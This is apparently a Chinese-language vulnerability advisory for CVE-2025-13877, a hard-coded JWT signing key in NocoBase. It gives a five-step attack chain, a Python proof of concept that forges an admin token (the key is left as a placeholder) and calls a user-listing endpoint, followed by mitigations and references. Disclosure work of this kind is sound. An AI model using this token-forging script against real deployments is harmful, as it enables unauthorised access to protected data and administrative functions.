CVE-2025-13877 NocoBase JWT Service 硬编码加密密钥漏洞

漏洞信息

漏洞编号

CVE-2025-13877

漏洞类型

使用硬编码加密密钥

CVSS评分

5.6 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NocoBase

漏洞概述

CVE-2025-13877是NocoBase框架中的一个安全漏洞，存在于JWT认证服务的加密实现中。该漏洞影响NocoBase 1.9.4及之前版本和2.0.0-alpha.37及之前版本。攻击者可利用JWT Service中硬编码的加密密钥，通过API_KEY参数进行未授权访问。由于硬编码密钥被嵌入到源代码中，攻击者一旦获取该密钥，即可伪造有效的JWT token，绕过身份认证机制，进而访问受保护的API资源。该漏洞具有较高的利用复杂性，但已被公开披露，可能存在被恶意利用的风险。

技术细节

该漏洞位于nocobase\packages\core\auth\src\base\jwt-service.ts文件中，JWT Service组件在处理认证请求时使用了硬编码的加密密钥（API_KEY）。在JWT token生成和验证过程中，系统使用了这个固定的密钥，导致所有使用该框架的部署共享相同的加密密钥。攻击者可以通过以下方式利用：1) 通过分析源代码或逆向工程获取硬编码密钥；2) 使用获取的密钥构造恶意的JWT payload；3) 在请求中替换或伪造JWT token；4) 绕过认证机制访问敏感API。由于CVSS评分为5.6（中等严重性），攻击复杂度较高（AC:H），但攻击者可远程发起攻击（AV:N）且无需认证（PR:N）和用户交互（UI:N），最终可导致机密性、完整性和可用性部分受影响。

攻击链分析

STEP 1

步骤1

获取硬编码密钥：攻击者通过分析NocoBase源代码或逆向工程手段，从jwt-service.ts文件中提取硬编码的API_KEY

STEP 2

步骤2

构造恶意JWT payload：使用获取的硬编码密钥，构造包含提升权限信息的JWT token payload

STEP 3

步骤3

生成伪造token：利用JWT库和硬编码密钥，生成有效的JWT token以绕过认证检查

STEP 4

步骤4

发起认证绕过请求：在HTTP请求的Authorization头中携带伪造的JWT token，访问原本需要认证的API端点

STEP 5

步骤5

未授权访问：成功绕过认证后，攻击者可访问敏感数据、修改配置或执行特权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import jwt
import requests

# Hard-coded API_KEY from jwt-service.ts (example key)
API_KEY = "your_hardcoded_key_here"

# Target URL
TARGET_URL = "http://target-server/api/"

# JWT Token Generation using hard-coded key
def generate_fake_jwt(payload):
    """
    Generate a JWT token using the hard-coded cryptographic key
    """
    token = jwt.encode(payload, API_KEY, algorithm="HS256")
    return token

# Exploit: Bypass authentication
def exploit(target_path):
    """
    Exploit CVE-2025-13877 by forging JWT token
    """
    # Craft payload with elevated privileges
    payload = {
        "sub": "admin",
        "role": "admin",
        "iat": 1733000000,
        "exp": 1733086400
    }
    
    # Generate fake token
    fake_token = generate_fake_jwt(payload)
    
    # Send request with forged token
    headers = {
        "Authorization": f"Bearer {fake_token}",
        "Content-Type": "application/json"
    }
    
    response = requests.get(TARGET_URL + target_path, headers=headers)
    return response

if __name__ == "__main__":
    # Example: Access admin endpoint
    result = exploit("users:list")
    print(f"Status: {result.status_code}")
    print(f"Response: {result.text}")

影响范围

NocoBase < 1.9.5

NocoBase < 2.0.0-alpha.38

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在Web应用防火墙(WAF)中配置规则，检测异常的JWT token结构；2) 限制API访问来源IP，使用白名单机制；3) 启用额外的应用层认证机制，如二次验证；4) 监控JWT认证相关的异常日志；5) 考虑临时禁用受影响版本的JWT认证功能，切换到其他认证方式。但请注意，这些措施仅为临时缓解，不能根本解决问题，强烈建议尽快升级到官方修复版本。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13877
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13877
3 Details https://www.cvedetails.com/cve/CVE-2025-13877/
4 VulDB https://vuldb.com/cve/CVE-2025-13877
5 Link https://gist.github.com/H2u8s/f3ede60d7ecfe598ae452aa5a8fbb90d
6 Link https://vuldb.com/?ctiid.334033
7 Link https://vuldb.com/?id.334033
8 Link https://vuldb.com/?submit.692205